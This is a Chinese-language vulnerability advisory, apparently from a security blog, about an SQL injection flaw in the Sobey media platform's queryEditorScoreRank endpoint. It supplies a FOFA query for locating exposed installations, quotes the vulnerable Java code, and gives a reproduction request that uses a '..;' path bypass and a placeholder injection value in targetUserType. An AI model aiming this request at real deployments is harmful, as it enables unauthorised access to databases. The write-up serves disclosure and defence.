索贝融媒体 /sobey-mchEditor/mch/jztEditorScore/queryEditorScoreRank SQL注入漏洞


漏洞简介

索贝产品中的 /sobey-mchEditor/mch/jztEditorScore/queryEditorScoreRank 接口存在SQL注入漏洞,攻击者可以通过构造恶意的SQL语句,获取数据库中的敏感信息,甚至可能导致数据库被完全控制。

影响版本

fofa语法

icon_hash="689611853"||app="SOBEY-融媒体" || body="You need to enable JavaScript to run this app" && header="Sobey"

漏洞分析

根据漏洞信息看下mch/jztEditorScore/queryEditorScoreRank的实现逻辑

@RequestMapping(
    value = {"/queryEditorScoreRank"},
    method = {RequestMethod.GET}
)
public Response queryEditorScoreRank(@RequestParam(value = "createStartTime",required = false) String createStartTime, @RequestParam(value = "endStartTime",required = false) String endStartTime, @RequestParam(value = "pageSize",required = false,defaultValue = "10") Integer pageSize, @RequestParam(value = "pageIndex",required = false,defaultValue = "0") Integer pageIndex, @RequestParam(value = "userName",required = false) String userName, @RequestParam("token") String token, @RequestParam("siteCode") String siteCode, @RequestParam(value = "targetUserType",required = false) String targetUserType, HttpServletRequest request) {
    QueryBuilder qb = new QueryBuilder(" select sum(zcncommoneditorscore.score) editeScoreTotal, count(distinct a.id) num, zcncommoneditorscore.targetUserCode , zcncommoneditorscore.targetUserName , zcncommoneditorscore.prop1 organizationName from zcnarticle a");
    if (!StringUtils.isEmpty(targetUserType)) {
        qb.append(String.format(JztEditorScoreServiceImpl.innerJoinTargetTypeScoreSQL, targetUserType));
    } else {
        qb.append(JztEditorScoreServiceImpl.innerJoinScoreSQL);
    }

参数targetUserType使用String.format格式化后,无任何过滤或校验处理,被直接拼接到qb这个sql语句中执行,从而造成了SQL注入漏洞。

漏洞复现

GET /sobey-mchEditor/js/..;/mch/jztEditorScore/queryEditorScoreRank?siteCode=&targetUserType='SQLI_POC&token=&userCode=admin HTTP/1.1
Host: sobey.mrxn.net

成功通过报错注入在响应回显数据库用户信息


手机扫码阅读

孚盟云CRM AjaxCustomizeReport.ashx SQL注入漏洞

孚盟云CRM AjaxCoustomerShare.ashx SQL注入漏洞

评 论